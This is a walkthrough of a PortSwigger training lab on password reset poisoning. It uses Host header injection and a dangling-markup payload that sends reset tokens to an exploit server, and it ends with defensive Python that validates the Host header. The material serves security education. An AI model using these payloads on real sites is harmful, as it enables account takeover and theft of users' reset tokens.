Labs Covered
This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy related to HTTP Host Header Attacks:
Lab 7 - Password reset poisoning via dangling markup
This lab demonstrates how attackers can exploit dangling markup combined with unsanitized Host headers to poison password reset links and compromise user accounts.
LAB 7 - Password reset poisoning via dangling markup
Lab Description
Solution
Step-by-step Process
1. Trigger Password Reset for Wiener
- Go to the forgot password functionality as user wiener.
- Submit the request and intercept it using Burp Suite.
- Forward the request to initiate the password reset process.
2. Monitor Exploit Server for Reset Email
- Visit the Exploit Server provided by the lab.
- Click on the “Email Client” feature.
- You will see a password reset email for wiener that includes:
  - A reset link.
  - A temporary password or a clickable link to log in.
3. Test Host Header Manipulation
- Go back to the forgot password request and change the Host header to an arbitrary value (e.g., Host: evil.com).
- You will likely receive a 504 Internal Server Error, indicating that the application uses the Host header when generating the reset link.
4. Test with Exploit Server Domain
- Replace the Host header with your exploit server domain, for example: Host: exploit-0a0c00...exploit-server.net
- Submit the request. If successful, the password reset link will point to your server.
5. Testing with Arbitrary Port
- You can also test whether the server accepts an arbitrary port in the Host header: Host: exploit-0a0c00...exploit-server.net:90
- If the password reset still goes through, the application is vulnerable and includes the full Host value (including the port) in the reset link.
6. Injecting a Malicious Host Payload
- Try injecting a Host header whose port portion carries a URL-prefixed payload, such as:
  Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
- Because the opening quote of the injected href is never closed, the rest of the email's markup, including the reset token, becomes part of the link's URL (the dangling markup), so following the generated link sends the token to your server.
7. Verify on Exploit Server
- Go to your exploit server’s access log or monitor incoming requests.
- You should see a request containing the reset token or temporary password.
- In this test, we are doing this for wiener, not carlos.
8. Login as Wiener
- Use the captured reset token or password to log in as wiener.
- This confirms that the exploit works.
9. Repeat for Carlos
- Go back to the forgot password form and submit a reset request for carlos.
- Use the same Host header injection payload:
  Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
- Intercept and forward the request.
10. Extract Carlos’s Token
- Check your exploit server access logs.
- You should now see the reset link or password for carlos.
11. Log in as Carlos
- Use the password from the intercepted link to log in as carlos.
- Lab is successfully solved.
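The root cause the lab exercises is that the reset link is built from the unvalidated Host header, so an exploit-server hostname, an arbitrary port, or a quote-and-markup payload in the port position all end up in the email. The following Python is an added example, not the lab application's code or part of the write-up, showing how a reset-link builder can validate the Host header against an allowlist and reject each of the values used above; the hostnames, reset path and function names are assumptions.

```python
# Added example (not the lab's code): validate the Host header before it is
# used in a password reset link. Allowlist, origin and path are assumed values.
from urllib.parse import quote

ALLOWED_HOSTS = {"your-lab-id.web-security-academy.net"}  # assumed
RESET_PATH = "/reset?token="                                # assumed
CANONICAL_ORIGIN = "https://your-lab-id.web-security-academy.net"


def parse_host_header(value: str):
    """Return (hostname, port) for a well-formed Host header.

    Raises ValueError unless the value is `hostname` or `hostname:port` with a
    numeric port. The lab payload puts a quote and an <a> tag where the port
    belongs, so it fails here before any link is built.
    """
    host, sep, port = value.strip().partition(":")
    if not host or not all(c.isalnum() or c in ".-" for c in host):
        raise ValueError("invalid hostname")
    if not sep:
        return host.lower(), None
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        raise ValueError("invalid port")
    return host.lower(), int(port)


def is_trusted_host(value: str) -> bool:
    """True only for an allowlisted hostname on the default HTTPS port."""
    try:
        hostname, port = parse_host_header(value)
    except ValueError:
        return False
    return hostname in ALLOWED_HOSTS and port in (None, 443)


def build_reset_link(host_header: str, token: str) -> str:
    """Build the reset link from the Host header only if it is trusted."""
    if not is_trusted_host(host_header):
        raise ValueError("untrusted Host header; refusing to build reset link")
    hostname, _ = parse_host_header(host_header)
    return f"https://{hostname}{RESET_PATH}{quote(token)}"


def build_reset_link_canonical(token: str) -> str:
    """Preferred fix: ignore the Host header and use a configured origin."""
    return f"{CANONICAL_ORIGIN}{RESET_PATH}{quote(token)}"
```

The allowlist check blocks the exploit-server domain and the arbitrary port from steps 4 and 5, and the port parser blocks the dangling-markup payload from step 6; using the configured origin avoids the request-derived value entirely.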